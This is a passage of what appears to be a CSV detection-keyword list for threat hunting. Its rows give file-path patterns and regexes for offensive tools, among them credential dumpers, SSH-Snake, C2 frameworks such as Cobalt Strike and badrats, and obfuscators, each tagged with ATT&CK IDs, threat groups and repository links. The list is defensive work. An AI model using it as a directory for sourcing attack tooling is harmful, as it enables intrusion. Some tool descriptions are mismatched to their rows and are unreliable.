- T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*/backupcreds.exe*",".{0,1000}\/backupcreds\.exe.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","1","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*/BackupCreds.git*",".{0,1000}\/BackupCreds\.git.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","1","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*/BackupOperatorToDA.git*",".{0,1000}\/BackupOperatorToDA\.git.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*/BackupPrivSam/*",".{0,1000}\/BackupPrivSam\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","10","10","155","24","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" "*/bacnet-info.nse*",".{0,1000}\/bacnet\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bad-3-corrupt_lzma2.xz | tr *",".{0,1000}\/bad\-3\-corrupt_lzma2\.xz\s\|\str\s.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","10","10","N/A","N/A","N/A","N/A" "*/badcert.pem*",".{0,1000}\/badcert\.pem.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*/badkey.pem*",".{0,1000}\/badkey\.pem.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*/badrat.ps1*",".{0,1000}\/badrat\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*/badrat_cs.exe*",".{0,1000}\/badrat_cs\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*/badrat_server.py*",".{0,1000}\/badrat_server\.py.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*/badrats.git*",".{0,1000}\/badrats\.git.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*/BadZure.git*",".{0,1000}\/BadZure\.git.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*/BadZure/*",".{0,1000}\/BadZure\/.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*/banner.nse*",".{0,1000}\/banner\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/BaseNEncoder.cs*",".{0,1000}\/BaseNEncoder\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/bash_completion.d/exegol*",".{0,1000}\/bash_completion\.d\/exegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/bash_executor/*.go",".{0,1000}\/bash_executor\/.{0,1000}\.go","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/bashexplode/boko*",".{0,1000}\/bashexplode\/boko.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","65","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "*/Bashfuscator*",".{0,1000}\/Bashfuscator.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1504","175","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*/Bates.csproj*",".{0,1000}\/Bates\.csproj.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/batik_svg*",".{0,1000}\/batik_svg.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/bazarloader.profile*",".{0,1000}\/bazarloader\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/bbaranoff/CVE-2022-0847/*",".{0,1000}\/bbaranoff\/CVE\-2022\-0847\/.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","48","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" "*/beacon.h",".{0,1000}\/beacon\.h","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","10","10","155","24","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" "*/beacon_202_no_acl.log*",".{0,1000}\/beacon_202_no_acl\.log.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/beacon_257-objects.log*",".{0,1000}\/beacon_257\-objects\.log.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/beacon_compatibility*",".{0,1000}\/beacon_compatibility.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","223","41","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*/beacon_compatibility.*",".{0,1000}\/beacon_compatibility\..{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","426","68","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*/beacon_funcs/*",".{0,1000}\/beacon_funcs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/beacon_generate.py*",".{0,1000}\/beacon_generate\.py.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*/beacon_health_check/*",".{0,1000}\/beacon_health_check\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","136","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" "*/beacon_http/*",".{0,1000}\/beacon_http\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/beacon_notify.cna*",".{0,1000}\/beacon_notify\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/BeaconChannel.cs*",".{0,1000}\/BeaconChannel\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/beaconhealth.cna*",".{0,1000}\/beaconhealth\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","136","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" "*/beacon-injection/*",".{0,1000}\/beacon\-injection\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","144","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*/beacon-object-file*",".{0,1000}\/beacon\-object\-file.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 